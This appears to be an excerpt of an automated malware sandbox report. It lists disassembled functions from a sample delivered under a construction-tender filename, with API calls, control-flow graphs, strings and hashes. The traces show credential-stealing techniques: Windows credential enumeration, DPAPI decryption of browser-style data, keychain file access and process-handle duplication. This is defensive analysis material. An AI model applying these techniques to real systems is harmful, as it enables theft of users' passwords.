                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                          • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                          • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                          • API String ID: 1344430650-1740548384
                                                                                                                          • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                          • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                          Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                          • String ID: AE$BIN
                                                                                                                          • API String ID: 1668488027-3931574542
                                                                                                                          • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                          • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                          Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 767404330-0
                                                                                                                          • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                          • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3558857096-0
                                                                                                                          • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                          • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 41 445823-445826 14->41 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 50 445879-44587c 18->50 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 32 445605-445607 22->32 33 445603 22->33 30 4459f2-4459fa 23->30 31 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->31 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 43 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 30->43 44 445b29-445b32 30->44 145 4459d0-4459e8 call 40b6ef 31->145 146 4459ed 31->146 32->21 37 445609-44560d 32->37 33->32 37->21 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 37->48 38->3 39->38 51 44584c-445854 call 40b1ab 41->51 52 445828 41->52 182 445b08-445b15 call 40ae51 43->182 53 445c7c-445c85 44->53 54 445b38-445b96 memset * 3 44->54 156 445665-445670 call 40b1ab 48->156 157 445643-445663 call 40a9b5 call 4087b3 48->157 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 82 445fae-445fb2 60->82 83 445d2b-445d3b 60->83 160 445cf5 61->160 161 445cfc-445d03 61->161 64->19 75 445884-44589d call 40a9b5 call 4087b3 65->75 143 445849 66->143 249 445c77 67->249 68->67 76 445ba2-445bcf call 4099c6 call 445403 call 445389 68->76 148 44589f 75->148 76->53 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 110 4456ba-4456c4 78->110 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 193 445e17 99->193 194 445e1e-445e25 99->194 123 4457f9 110->123 124 4456ca-4456d3 call 413cfa call 413d4c 110->124 123->6 174 4456d8-4456f7 call 40b2cc call 413fa6 124->174 140->141 141->23 143->51 145->146 146->30 148->64 150->78 150->93 156->110 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->60 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 193->194 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 194->198 199 445e6b-445e7e call 445093 194->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->44 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 254 445f9b 220->254 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->53 254->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                          • API String ID: 1963886904-3798722523
                                                                                                                          • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                          • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                          • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                          • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
